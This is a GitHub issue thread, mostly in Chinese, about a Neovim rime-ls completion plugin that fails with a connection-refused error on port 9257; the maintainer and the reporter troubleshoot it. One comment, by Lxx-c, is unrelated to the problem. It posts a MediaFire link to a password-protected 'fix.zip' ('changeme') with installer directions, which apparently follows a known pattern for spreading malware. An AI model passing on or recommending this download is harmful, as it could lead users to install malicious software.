### ISSUE TITLE
端口拒绝

### ISSUE THREAD

**Issue by wt-gao** [liubianshi/cmp-lsp-rimels#9]
端口拒绝：
```
Warn  22:36:03 notify.warn Could not connect to 127.0.0.1:9257, reason: "ECONNREFUSED"
```

配置：
```lua
config = function()
  vim.system({ "D:/user/LSP/rime-ls/rime_ls.exe", "--listen", "127.0.0.1:9257" })
  require("rimels").setup({
    keys = { start = ";f", stop = ";;", esc = "jj" },
    -- cmd = { "D:/user/LSP/rime-ls/rime_ls.exe" },
    cmd = vim.lsp.rpc.connect("127.0.0.1", 9257),
    rime_user_dir = "D:/user/LSP/rime-ls/Rime",
    shared_data_dir = "D:/user/Rime/weasel-0.16.1/data",
  })
```

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by liubianshi** [comment]
在终端运行 `D:/user/LSP/rime-ls/rime_ls.exe --listen 127.0.0.1:9257` 的结果如何呢？

**Comment by wt-gao** [comment]
> 在终端运行 `D:/user/LSP/rime-ls/rime_ls.exe --listen 127.0.0.1:9257` 的结果如何呢？

`rime_ls.exe`应该已经启动，后台端口已经处于`LISTENING`状态，好像是`vim.lsp.rpc.connect("127.0.0.1", 9257)`出的问题。

**Comment by liubianshi** [comment]
那应该是了。您这报的错误，和我这将端口改成一个没有监听的端口时一样。直接运行 `:lua vim.lsp.rpc.connect("127.0.0.1", 9257)()` 应该也会报同样的错误。

**Comment by wt-gao** [comment]
直接运行`rime_ls.exe`吧，懒得折腾了。

**Comment by liubianshi** [comment]
是挺折腾的。如果只开一个 nvim 进程，问题应该不大，我在 Linux 会常常会打开多个 nvim, 从而开启多个 rime_ls，时不时会出现冲突而无法使用的情况。换成 `vim.lsp.rpc.connect("127.0.0.1", 9257)` 后，这类冲突倒是再也没有出现过了。
